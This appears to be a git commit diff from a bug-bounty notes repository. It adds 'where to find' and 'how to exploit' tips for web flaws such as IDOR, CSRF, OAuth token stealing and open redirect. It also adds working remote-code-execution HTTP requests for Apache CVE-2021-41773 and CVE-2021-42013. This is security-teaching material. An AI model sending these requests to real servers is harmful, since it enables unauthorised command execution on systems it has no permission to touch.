Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization.
5
5
6
-
## How to find
6
+
## Where to find
7
+
This vulnerability can appear in all features of the application.
8
+
9
+
## How to exploit
7
10
1. Review Functionality
8
11
- Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product.
9
12
- Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve.
A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
5
+
6
+
## Where to find
7
+
It can be found anywhere, always check the request and response. Try to search for parameters that lead to redirects, you can see the response is (301, 302, 303, 307, 308).
Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated
5
5
6
+
## How to find
7
+
Usually found in forms. Try submit the form and check the HTTP request. If the HTTP request does not have a CSRF token then it is likely to be vulnerable to a CSRF attack. But in some cases, the CSRF token can be bypassed, try check this [List](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Bypass/Bypass%20CSRF.md)
A type of XSS that has payloads found in the DOM rather than within the HTML code.
14
14
15
-
## **How to exploit**
15
+
## Where to find
16
+
This vulnerability can appear in all features of the application. If you want to find Dom-based XSS, you can find it by reading the javascript source code.
Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it
5
-
## How to FInd
5
+
6
+
## Where to find
7
+
This vulnerability can appear in all features of the application. Depending on how to exploit it, for example in the file upload feature, you can upload very large files
Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.
HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks.
5
5
6
+
## Where to find
7
+
In the feature where the website can send email to us. For example forgot password / newsletter.
IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system.
5
5
6
-
## How to FInd
6
+
## Where to find
7
+
- Usually it can be found in APIs.
8
+
- Check the HTTP request that contain unique ID, for example `user_id` or `id`
9
+
10
+
## How to exploit
7
11
1. Add parameters onto the endpoints for example, if there was
The most infamous OAuth-based vulnerability is when the configuration of the OAuth service itself enables attackers to steal authorization codes or access tokens associated with other users’ accounts. By stealing a valid code or token, the attacker may be able to access the victim's account.
5
5
6
-
## How to find
6
+
## Where to find
7
+
In the SSO feature. For example `Log in with google` or `Log in with facebook`.
8
+
9
+
## How to exploit
7
10
1. OAuth token stealing: Changing redirect_uri to attacker.com(Use IDN Homograph or common bypasses).
8
11
2. Change Referral header to attacker.com while requesting OAuth.
9
12
3. Create an account with [email protected] with normal functionality. Create account with [email protected] using OAuth functionality. Now try to login using previous credentials.
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain
5
5
6
-
## How to Find
6
+
## Where to find
7
+
- Sometimes it can be found in login / register / logout pages
What would you do if you came across a website that uses Apache (HTTP Server)?
5
+
6
+
## How to Detect
7
+
Usually in the HTTP response there is a header like this `Server: Apache` or `Server: Apache/2.4.50` and check the 404 page
8
+
9
+
1. Find the related CVE by checking Apache (HTTP Server) version
10
+
* How to find the Apache (HTTP Server) version
11
+
12
+
By checking the response header or using 404 page, sometimes the version is printed there. If you found outdated Apache (HTTP Server) version, find the CVEs at [CVE Details](https://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/Apache-Http-Server.html)
13
+
14
+
Some example CVE:
15
+
16
+
- CVE-2021-41773 (RCE and LFI)
17
+
```
18
+
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
19
+
Host: 127.0.0.1:8080
20
+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
21
+
Accept: */*
22
+
Content-Length: 7
23
+
Content-Type: application/x-www-form-urlencoded
24
+
Connection: close
25
+
26
+
echo;id
27
+
```
28
+
- CVE-2021-42013 (RCE and LFI)
29
+
```
30
+
POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
31
+
Host: 127.0.0.1:8080
32
+
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Muhammad Daffa
committed
2 years ago
1 parent fdaf048f